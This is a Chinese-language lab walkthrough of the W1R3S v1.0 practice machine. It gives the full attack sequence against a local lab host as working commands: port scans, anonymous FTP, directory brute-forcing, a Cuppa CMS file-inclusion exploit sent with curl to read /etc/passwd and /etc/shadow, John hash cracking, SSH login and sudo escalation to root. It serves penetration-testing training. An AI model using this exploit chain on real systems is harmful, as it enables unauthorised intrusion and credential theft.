打靶笔记w1r3s.v1.0

打靶笔记w1r3s.v1.0

nmap扫描与分析

主机发现

nmap -sn 192.168.218.0/24
历史版本为-sP(已经被放弃)
n 不进行端口扫描

192.168.218.155

image-20240528182512312

创建文件夹保存端口信息

image-20240528184733528

指定最低1万速率扫描所有端口

nmap -sT --min-rate 10000 -p- 192.168.218.155 nmapscan/ports

-sS SYN扫描是快速扫描(有时防火墙会有SYN过滤)
而-sT 是完整tcp三次握手扫描(准,隐蔽性)

10000 避免判定恶意、网络、打靶能承受(速度平衡)
-p 端口
- 1-65535简写
0 输出
A 所有文件格式

image-20240528184946731

gnmap格式已经被放弃,处于历史延续性被保留
nmap与屏幕输出一样
xml不言而喻

image-20240528185059937

提取端口

grep open nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ','

image-20240528185758744

详细信息扫描(分析重点)

nmap -sT -sV -sC -O -p21,22,80,3306 192.168.218.155 -oA nmapscan/detail

-sC 默认脚本扫描

80权重最重

3306可能有弱密码访问权限,可能配合其他环境完成利用

22在渗透方面排后,通过ssh拿到登录权限意义不大

20min不能拿到进一步结果就要切换下一个攻击向量

结合环境判断选择

image-20240528185956469

udp扫描

nmap -sU --top-ports 20 192.168.218.155 -oA nmapscan/udp

--top-ports 前20

image-20240528190152519

默认脚本扫描

nmap --script=vuln -p21,22,80,3306 192.168.218.155 -oA nmapscan/vuln

21、22并没有更多的信息

80提示没有csrf、xsrf,提示有dos攻击(基本不会选,过于暴力,没有技术含量),没有找到关于DOM的XSS

mysql试探

3306也没有新的发现

image-20240528194429351

ftp渗透

匿名用户登录成功

image-20240528194613817

使用binary切换到二进制模式

ftp交互命令行可以用?显示

image-20240528194656073

先关闭交互式,不用每次确认

image-20240528194904992

下载,将三个文件内容全部下载到kali分析

mget *.txt

将txt文件一起读出来

image-20240528195206631

一个是md5、一个是base64

不知道什么加密可以使用kali工具hash-identifier

来识别

image-20240528195552394

SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==
It is easy, but not that easy..
01ec2d8fc11c493b25029fb1f47f39ce
This is not a password

初学者尽量使用kali自带工具,在比赛中可能没有脚本工具,复杂破解不出来,这题还得用破解网站去做

image-20240528195846174

image-20240528200154884

image-20240528200527776

我们用明文校验一下,正确

image-20240528200354861

他用使用ASCII码输出 the W1R3S.inc

以及这家公司员工列表

image-20240528201828004

后面逆序和反转文字,可以选择截屏进行旋转,使用在线工具

we have a ןot of work to do‘ stop pןayıng around˙˙˙˙
      ı don't thınk thıs ıs the way to root!
 我们有很多工作要做'停止 pןayıng 在 ̇ ̇ ̇ ̇ ̇ 周围
      不要 thınk thıs 是根的方式!

image-20240528202316207

21端口目前信息就这些了,22端口优先级排后,暂时不看

看3306,使用空密码,说错误 1130 (HY000):不允许主机“192.168.218.145”连接到此 MySQL 服务器

不允许kali连接,暂时不成功

image-20240528202637116

web渗透

image-20240528202712501

然后看源码,简单html布局,css代码,标题与注释目前也没有作用提示

image-20240528202837375

目录爆破

gobuster dir -u http://192.168.218.155 --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

image-20240528203604162

看到administrator可以打开,页面的title显示是CUppa CMS ,程序安装页面

奇怪的是进入wordpress自动跳转到localhost页面

目前没有将所有信息进行验证,暂时将kali设置localhost等配置优先级排后

cuppa cms渗透

执行next(在实际过程中,因为在没有进去对网站进行不可逆操作,可能被管理员发现,我们应该对此有预期)

继续下一步

image-20240528204546555

配制文件、创建表格正常;管理员用户创建失败

image-20240528204611867

只有back、回去、看一下源码;也没有获取有用信息

只要是管理系统,就会有大大小小的漏洞;循着这个思路searchsploit(数据库搜索工具)找一下

searchsploit搜索的是https://www.exploit-db.com/的本地copy;他是不联网的

如果有多个,就一条一条试;并不一定都成

image-20240528205136237

searchsploit cuppa -m 25971
-m 实际上等于做了一个镜像

cuppa cms 25791利用

把25971下载到当前路径

image-20240528205342469

分析漏洞如何利用

image-20240528205625194

image-20240528205858246

先测试下漏洞是否存在,根据txt测试

测试装在cuppa文件夹下

http://192.168.218.155/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

image-20240528210111815

那可能cuppa在安装中被指定administrator目录;这么去推断;这个只能去猜,简单的猜

http://192.168.218.155/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

ok这个是显示;但是并没有读取出passwd,看一下源码;源码也没有泄露出passwd信息

有内容,没有读出来,按照给的txt就是这么操作的

alertConfig是作为参数给出来的,一般作为参数是用get方式处理数据的,但是程序的处理逻辑未必是这样

txt中还有base64编码的问题,这是在利用中提到的一点,我们要在利用中进行尝试;可以用burp

image-20240528210322038

可以做代码审计的,他是服务管理系统,有软件链接,

image-20240528211414514

使用wget下载

txt说文件22行,这个是样式文件,还是用关键字寻找吧

在alerts的文件下,源码有些变化;漏洞依然是存在的;它是用POST方式传输,并且没有做任何处理,那这样就简单了,可以用burp site也可以用命令行工具

image-20240528211710229

curl有一个对url进行编码,并且通过POST方式进行传递

image-20240528212038350

curl --data-urlencode 'urlConfig=../../../../../../../../../etc/passwd' http://192.168.218.155/administrator/alerts/alertConfigField.php

看到已经列出passwd内容

每个用户第二段都是x,证明密码以哈希方式存在shadow中;所以回去找shadow文件

image-20240528212346537

火狐方法

image-20240528212442060

shadow文件

是可以的

image-20240528212616900

image-20240528212707318

将没有hash的用户删掉;目前有root、www-data、w1r3s用户

john破解shadow

丢给John破解

image-20240528213947948

获得系统立足点和提权

使用ssh连接w1r3s

提示是正确的路吗

哦 可能

image-20240528214135254

成功

image-20240528214343806

查看sudo -l

拥有全部权限

image-20240528214657675

用sudo 启动bash会话

image-20240529141511457

找到flag

image-20240529141542188

ssh暴力破解

不推荐思路

image-20240529161548631

同也可以破解出来

image-20240529161824675

w1r3s.v1.0靶机总结

不要忽略udp、ipv6

兔子洞不重要,要逐一尝试

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/673682.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

ubuntu安装notion

一、背景: 不用windwos系统,完全可以,然后基本软件都有,怎么安装notion呢 二、步骤 1. 更新源 echo "deb [trustedyes] https://apt.fury.io/notion-repackaged/ /" | sudo tee /etc/apt/sources.list.d/notion-repa…

【一小时学会Charles抓包详细教程】Charles移动端APP抓包之iOS手机端数据提取实战篇 (8)

🚀 个人主页 极客小俊 ✍🏻 作者简介:程序猿、设计师、技术分享 🐋 希望大家多多支持, 我们一起学习和进步! 🏅 欢迎评论 ❤️点赞💬评论 📂收藏 📂加关注 Charles 移动端…

详解C/C++动态内存函数(malloc、free、calloc、realloc)

1. malloc和free 为解决静态内存开辟存在的问题,C语言提供了一个动态内存开辟的函数: malloc为memory allocation的简写,意为内存分配。 这个函数的作用是向内存申请一块连续可用的空间,并返回指向这块空间的指针。 比如&#xf…

Adversarial Nibbler挑战:与多元社区持续开展开放红队测试

每周跟踪AI热点新闻动向和震撼发展 想要探索生成式人工智能的前沿进展吗?订阅我们的简报,深入解析最新的技术突破、实际应用案例和未来的趋势。与全球数同行一同,从行业内部的深度分析和实用指南中受益。不要错过这个机会,成为AI领…

【MySQL数据库】MySQL 高可用搭建方案——MHA实战

MHA(Master High Availability) MHA实战 MHA(Master High Availability) 一、MHA简介二、MHA搭建准备要求:mha集群搭建,4台服务器,1主2从,1台mha2.1实验思路2.2实验准备 三、搭建MyS…

【数据结构】链式二叉树详解

个人主页~ 链式二叉树基本内容~ 链式二叉树详解 1、通过前序遍历的数组来构建二叉树2、二叉树的销毁3、二叉树节点个数4、二叉树叶子节点个数5、二叉树第k层节点个数6、二叉树查找7、前序遍历8、中序遍历9、后序遍历10、层序遍历与检查二叉树是否为完全二叉树Queue.hQueue.c层序…

Nginx实战:防盗链

防盗链的概念 内容不在自己的服务器上,通过技术手段将其他网站的内容(比如 一些音乐、图片、软件的下载地址)放置在自己的网站中,通过这 种方法盗取其他网站的空间和流量 防盗链技术背景 防止第三方引用链接访问我们的图片&#x…

FJSP:蛇鹫优化算法(SBOA)求解柔性作业车间调度问题(FJSP),提供MATLAB代码

详细介绍 FJSP:蛇鹫优化算法(Secretary bird optimization algorithm,SBOA)求解柔性作业车间调度问题(FJSP),提供MATLAB代码-CSDN博客 完整MATLAB代码 FJSP:蛇鹫优化算法&#xff…

SQL实验 连接查询和嵌套查询

一、实验目的 1.掌握Management Studio的使用。 2.掌握SQL中连接查询和嵌套查询的使用。 二、实验内容及要求(请同学们尝试每道题使用连接和嵌套两种方式来进行查询,如果可以的话) 1.找出所有任教“数据…

十_信号7-信号集

int sigemptyset(sigset_t *set); 清空信号集 int sigfillset(sigset_t *set); 填充满 信号集 int sigaddset(sigset_t *set, int signum); 向信号集中添加信号 int sigdelset(sigset_t *set, int signum); 从型号集中删除信号 int sigismember(const sigset_t *set, int s…

人大金仓×广州医科大学附属肿瘤医院 互联网智慧医疗服务平台国产化升级

KINGBASE 广州医科大学附属肿瘤医院是国内领先的肿瘤专科医院,在金仓数据库的支撑下,近日成功完成移动智慧综合服务平台国产化升级。作为互联网智慧医疗服务平台项目的核心平台,预计将服务数十万人次。这一升级改造不仅提高了医疗服务的效率和…

961题库 北航计算机 组成原理选择题 附答案 选择题形式

有题目和答案,没有解析,不懂的题问大模型即可,无偿分享。 第1组 习题 某计算机采用大端方式,按字节编址。某指令中操作数的机器数为 1234 FF00H,该操作数采用基址寻址方式,形式地址 ( 用补码表示 ) 为FF1…

如何监控慢 SQL?

引言:在开发和维护数据库驱动的应用程序时,监控慢 SQL 查询是确保系统性能和稳定性的关键一环。慢 SQL 查询可能会导致系统性能下降、资源浪费和用户体验差等问题。因此,及时监控和优化慢 SQL 查询对于保障系统的正常运行和用户满意度至关重要…

neutron学习小结

概述 基于yoga版本学习neutron,通过源码、官方文档、部署环境进行学习 neutron-dhcp-agent neutron.agent.dhcp_agent.main 创建server,调oslo_service launch server,最后实际调了server的start方法 neutron.service.Service.start Serv…

【UML用户指南】-03-UML的14种图

1、结构图 1、类图(class diagram) 展现了一组类、接口、协作和它们之间的关系。 在面向对象系统的建模中所建立的最常见的图就是类图。类图给出系统的静态设计视图。 包含主动类的类图给出系统的静态进程视图。构件图是类图的变体。 2、对象图&a…

转让北京电力施工总承包二级资质变更条件和流程

在电力工程领域,资质等级是企业能否参与竞标、承接工程的重要标志之一。北京电力工程总包二级资质的转让,是指已经取得该资质的企业将其资质转让给需要的企业。这种转让是基于合作与共赢的原则,旨在推动电力工程行业健康、稳定发展&#xff0…

Gin入门

Gin入门 声明:本博客为看李文周大佬gin入门视频笔记gin入门 我的代码仓库6月 沉着冷静/2023 - 码云 - 开源中国 (gitee.com) 安装 go get -u github.com/gin-gonic/gin第一个Gin实例: package mainimport ("github.com/gin-gonic/gin" )…

llvm 3.5 源码分析 clang for x86 001 之搭环境

0,目标 编译 针对x86 的,debug 的 c语言的编译器 1,下载代码 git clone --recursive 。。。llvm-project.git $ cd llvm-project 2,预备代码 llvm 3.5 版本的源代码,早期版本,可能比较小比较容易debug $…

发送Http请求的两种方式

说明:在项目中,我们有时会需要调用第三方接口,获取调用结果,来实现自己的业务逻辑。调用第三方接口,通常是双方确定好,由对方开放一个接口,需要我们根据他们提供的接口文档,组装Http…

STM32(九):USART串口通信 (标准库函数)

前言 上一篇文章已经介绍了如何用STM32单片机中独立看门狗来实现检测按键点灯的程序。这篇文章我们来介绍一下如何用STM32单片机中USART通信协议来串口通信,并向XCOM发送信息。 一、实验原理 1.通信的介绍 首先,我们先介绍一下通信,何为通…